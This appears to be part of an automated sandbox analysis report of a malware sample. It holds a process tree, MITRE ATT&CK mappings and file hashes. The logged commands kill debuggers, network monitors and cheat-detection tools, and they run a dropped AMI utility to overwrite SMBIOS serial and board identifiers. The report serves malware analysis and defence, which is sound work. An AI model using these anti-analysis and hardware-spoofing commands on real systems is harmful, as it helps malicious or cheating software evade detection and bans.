    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:2452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4520
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:3948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2096
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4744
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Cerber
    PID:3884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:1348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:4552
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Cerber
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1052
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
  2⤵
  PID:2232
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4120
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
  2⤵
  PID:632
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    - Executes dropped EXE
    PID:3152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4412
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
  2⤵
  PID:2400
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    - Executes dropped EXE
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
  2⤵
  PID:1856
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
    3⤵
    - Executes dropped EXE
    PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1516
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SS PPIG4BBTV4
  2⤵
  PID:4572
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SS PPIG4BBTV4
    3⤵
    - Executes dropped EXE
    PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4784
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
  2⤵
  PID:2088
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:5036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
  2⤵
  PID:2360
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    - Executes dropped EXE
    PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
  2⤵
  PID:4332
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    - Executes dropped EXE
    PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:5056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
  2⤵
  PID:4108
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4520
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Kills process with taskkill
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:4740
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Kills process with taskkill
    PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
  2⤵
  PID:776
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BV " "
  2⤵
  PID:2692
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BV " "
    3⤵
    - Executes dropped EXE
    PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4484
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BS PPIG4BBTV4WMV7
  2⤵
  PID:2212
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BS PPIG4BBTV4WMV7
    3⤵
    - Executes dropped EXE
    PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:5040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Kills process with taskkill
    PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
  2⤵
  PID:3196
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:8
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Kills process with taskkill
    PID:768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
  2⤵
  PID:4120
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
  2⤵
  PID:4460
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:2300
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
  2⤵
  PID:392
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"
    3⤵
    - Executes dropped EXE
    PID:3964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:3052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CS S1RONESHJK
  2⤵
  PID:4404
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CS S1RONESHJK
    3⤵
    - Executes dropped EXE
    PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:4880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
  2⤵
  PID:1704
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"
    3⤵
    - Executes dropped EXE
    PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:2616
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Kills process with taskkill
    PID:3536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
  2⤵
  PID:2360
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"
    3⤵
    - Executes dropped EXE
    PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2144
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
  2⤵
  PID:924
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."
    3⤵
    - Executes dropped EXE
    PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1708
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Kills process with taskkill
    PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
  2⤵
  PID:3948
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."
    3⤵
    - Executes dropped EXE
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1640
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
  2⤵
  PID:1840
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."
    3⤵
    - Executes dropped EXE
    PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Kills process with taskkill
    PID:3244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:3272
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    - Kills process with taskkill
    PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4132
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:4996
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:1876
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:1616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:4640
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    - Kills process with taskkill
    PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:5092
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    - Kills process with taskkill
    PID:940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:1856
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:3820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:392
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:2148
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM WmiPrvSE.exe
  2⤵
  PID:2464
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM WmiPrvSE.exe
    3⤵
    PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:1124
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:1832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Kills process with taskkill
    PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1840
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4972
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:3272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:5000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Kills process with taskkill
    PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:2000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2224
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:768
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1856
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4724
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3964
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3968

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\AMIDEWINx64.EXE

Filesize
455KB

MD5
9adfcdac59db3286690c7eede8da2528

SHA1
0b54d251438a634bd13b49a1f20587cf03d4598d

SHA256
13037eedd91f9313ec0d807947db65c639642e5ae6497e87d12fa6d19951f78e

SHA512
fde1700cdb4212593ec2733944a169c7d02f436ca6831719a33482fbfd0be289697c9aa6ce7ddfb6c245e87952b35416929bbf69753d21a24197ac6c2d1243cc

Download Submit
C:\Windows\System32\amifldrv64.sys

Filesize
29KB

MD5
f22740ba54a400fd2be7690bb204aa08

SHA1
5812387783d61c6ab5702213bb968590a18065e3

SHA256
65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9

SHA512
ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500

Download Submit
memory/2588-0-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/2588-1-0x00007FFDBC410000-0x00007FFDBC412000-memory.dmp

Filesize
8KB

Download
memory/2588-3-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/2588-2-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/2588-4-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/2588-5-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/2588-6-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download
memory/2588-35-0x0000000140000000-0x0000000140BBF000-memory.dmp

Filesize
11.7MB

Download